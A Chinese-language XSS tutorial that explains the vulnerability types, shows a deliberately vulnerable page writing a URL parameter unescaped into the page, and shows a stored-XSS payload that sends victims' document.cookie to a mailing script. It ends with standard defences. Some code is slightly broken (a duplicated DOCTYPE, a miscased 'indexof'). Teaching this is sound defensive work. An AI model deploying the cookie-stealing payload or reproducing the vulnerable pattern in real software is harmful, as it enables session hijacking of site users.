文章目录

---

一.XSS漏洞简介

        XSS漏洞（Cross-Site Scripting）是一种常见的Web应用程序安全漏洞，它允许攻击者在受害者的浏览器中注入恶意脚本。当受害者访问包含恶意脚本的网页时，攻击者就可以利用该漏洞来执行任意的代码，例如窃取用户的敏感信息、修改网页内容或进行其他恶意活动。

二.XSS漏洞类型

XSS漏洞是一种跨站脚本攻击漏洞，常见的XSS漏洞类型包括：

1. 存储型XSS：攻击者在目标网站的数据库中存储恶意脚本，当其他用户访问受影响的页面时，恶意脚本会被执行。

2. 反射型XSS：攻击者构造恶意URL，将恶意脚本注入到URL参数中，当用户点击这个URL时，恶意脚本会被执行。

3. DOM型XSS：攻击者通过修改页面的DOM结构来触发XSS漏洞，常见的攻击方式包括修改URL参数、修改表单数据等。

三.实战案例

反射型XSS

<!<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>反射型XSS</title><script type="text/javascript">   var s=location.search;      //返回URL中的？之后的查询部分  s=s.substring(1,s.length);  //返回整个查询内容var url=""                   if(s.indexOf("url=")>-1){   //判断url是否为空 var pos=s.indexof("url")+4; //过滤掉"url="字符url=s.substring(pos,s.length);//得到地址栏中的URL参数}else{url="url参数为空"}document.write("url:<a href='"+url+"'>"+url+"</a>");</script>		</head><body></body>
</html>

 当我们在URL中插入恶意的URL(如：恶意脚本)，当用户点击该恶意脚本的连接，恶意脚本将会被执行，如下图：

 存储型XSS

 利用存储型XSS窃取Cookie并发送到邮箱案例：

#PHP窃取cookie脚本
var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src= 'http://localhost/xss/sendmail.php?mycookie='+encodeURIComponent(document.cookie);注：document.cookie：返回访问当前网页的cookiesendmail.php：邮件发送程序实现的功能：将cookie发送到对应的邮箱

 当我们在输入框中输入恶意脚本后，若未对输入进行过滤，脚本将被保存在服务器的数据库中。

 当用户输入的URL刚好需要访问恶意脚本时，恶意脚本将被程序返回给用户并被调用，此时用户访问该网站的cookie将被发送到预先设置好的邮箱。

四.防护措施 

要防止XSS（跨站脚本攻击）漏洞，可以采取以下措施：

1. 输入验证和过滤：对用户输入的数据进行有效的验证和过滤，以确保不会包含恶意的脚本代码。可以使用正则表达式、编码函数或专门的输入过滤器来实现。

2. 输出编码：在将用户输入的数据显示在网页上之前，对其进行适当的输出编码，以防止浏览器将其解析为脚本代码。可以使用HTML实体编码、URL编码或JavaScript编码等方法。

3. 设置HTTP头：在网页中设置Content-Security-Policy（CSP）头，限制页面中可以加载和执行的资源，包括脚本文件、样式表和图片等。这可以防止恶意脚本被加载和执行。

4. 使用Web应用防火墙（WAF）：部署WAF可以对传入的请求进行检测和过滤，以防止XSS攻击。WAF可以根据已知的攻击模式和签名来识别和阻止恶意请求。

5. 设置cookie的HttpOnly属性：将cookie的HttpOnly属性设置为true，可以防止通过JavaScript访问和窃取cookie信息，从而减少XSS攻击的可能性。

此外，保持网站和服务器的安全性也非常重要，例如及时更新软件和插件，使用HTTPS协议进行数据传输等，这些措施可以降低XSS攻击的风险。